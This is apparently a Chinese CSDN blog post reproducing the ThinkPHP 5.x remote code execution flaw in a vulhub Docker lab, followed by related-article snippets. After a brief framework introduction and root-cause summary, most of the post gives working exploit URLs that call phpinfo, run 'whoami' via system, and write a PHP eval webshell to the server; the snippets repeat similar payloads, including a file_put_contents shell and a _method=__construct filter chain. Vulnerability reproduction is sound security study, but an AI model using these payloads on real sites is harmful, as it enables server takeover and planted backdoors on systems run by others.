THINKPHP

于 2024-08-07 15:06:50 发布
阅读量465 收藏 3
点赞数 14
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71053667/article/details/140992169
版权

Thinkphp框架介绍

ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。

官网网址

 https://www.thinkphp.cn/

TP5 rce

thinkphp5披露出的最多的漏洞就是rce , 其中的影响的版本范围非常广

5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30

不同版本 payload 不同,且5.13版本后还与debug模式有关

环境搭建

cd vulhub-master/thinkphp/5-rce
docker-compose up -d

漏洞原理

漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件

poc

http://ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

上述poc只是简单的运行了phpinfo , 我们可以修改payload , 进而实现漏洞的利用 

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

如果想要写入一句话木马 , 可以使用以下payload

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[jbxz]);?>" >1.php

 

发生什么事了318
关注
  • 14
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[漏洞复现]ThinkPHP 5.0.x 未开启强制路由导致的RCE
wwxxee
05-20 742
ThinkPHP 5.0.x 未开启强制路由导致的RCE 影响版本: ThinkPHP 5.0.5-5.0.22 ThinkPHP 5.1.0-5.1.30 环境: vulhub-master/thinkphp/5-rce 启动docker环境之后访问: 这个的版本是ThinkPHP 5.0.20版本: http://ip:8080/ POC: http://192.168.17.134:8080/index.php?s=/Index/\think\app/invokefunction&func
ThinkPHP新闻发布系统(前台+后台)绝对易学易用
05-17
ThinkPHP新闻发布系统:构建前端与后端的全面指南》 ThinkPHP,作为一个轻量级的PHP开发框架,以其简单、高效的特性深受开发者喜爱。本教程将带你深入理解如何利用ThinkPHP构建一个完整的新闻发布系统,包括前端...
Thinkphp 5-RCE漏洞复现
Tender*的博客
08-10 929
ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广漏洞原理其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。影响版本不同版本 payload 不同,且5.13版本后还与debug模式有关漏洞复现进入​。
thinkphp5 rce
weixin_51558394的博客
08-17 472
thinkphp5 rce
thinkphp5RCE
weixin_45778886的博客
03-07 1898
这里写目录标题加载第三方类库captcha路由。非debugpayload:1.路由检测1.1跟进self::routeCheck1.2跟进Route::check1.2.1在check函数进入$request->method(),1.2.2进入method()函数1.2.3进入__construct函数1.3跟进self::checkRoute1.4 跟进self::checkRule1.5跟进self::parseRule2.路由检测后,进入self::exec函数2.1 跟进exec函数2.2R
thinkphp5 RCE漏洞复现
feng的博客
03-03 3468
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
ThinkPHP_v5.0.7.zip_ThinkPHP V5.0.7_thinkphp
09-23
《深入理解ThinkPHP V5.0.7框架》 ThinkPHP,作为一个广受开发者欢迎的开源PHP框架,其V5.0.7版本是其发展过程中一个重要里程碑。这个版本不仅继承了ThinkPHP一贯的轻量级和面向对象设计原则,还引入了诸多新特性和...
ThinkPHP问答社区系统源码
12-27
ThinkPHP问答社区系统源码,问答讨论社区系统源码,一套基本的问答讨论社区框架,基于thinkphp开发,只是部分不太完善,基础的问答模块还是比较完整的,有能力的大佬可以拿去二开一下使用的。 ThinkPHP问答社区系统...
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞,ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
ThinkPHP v5.1.41.zip
03-27
《深入解析ThinkPHP v5.1.41:构建高效Web应用的核心技术》 ThinkPHP,作为国内广泛应用的开源PHP框架,一直以来都是开发者们构建Web应用程序的重要选择。本压缩包包含的是ThinkPHP v5.1.41版本,这是一个稳定且...
thinkphp5-rce
最新发布
shierbai的博客
05-17 470
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 740
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
thinkphp 5-rce版本漏洞复现(超详细版)
热门推荐
精品博客,你值得一看~
08-06 1万+
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7205
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路
shelter1234567的博客
01-16 1862
本节我将分析thinkphp5.0.x 版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2416
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 450
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2266
记录自己的所学以及理解。
ThinkPHP5.0.5RCE
1stPeak's Blog
08-06 977
访问 http://xx.xx.xx.xx:8080/index.php/?s=captcha payload: _method=__construct&filter[]=system&method=GET&get[]=系统命令 示例如下: post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行 post传入_method=__construct&filter
ThinkPHP3.2.2开发手册
"ThinkPHP3.2.2完全开发手册" ThinkPHP是一个轻量级的PHP MVC框架,由上海顶想信息科技有限公司开发并维护。它遵循Apache2开源协议,强调简洁实用的设计理念,旨在提高开发效率和用户体验。该框架自诞生以来,以其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值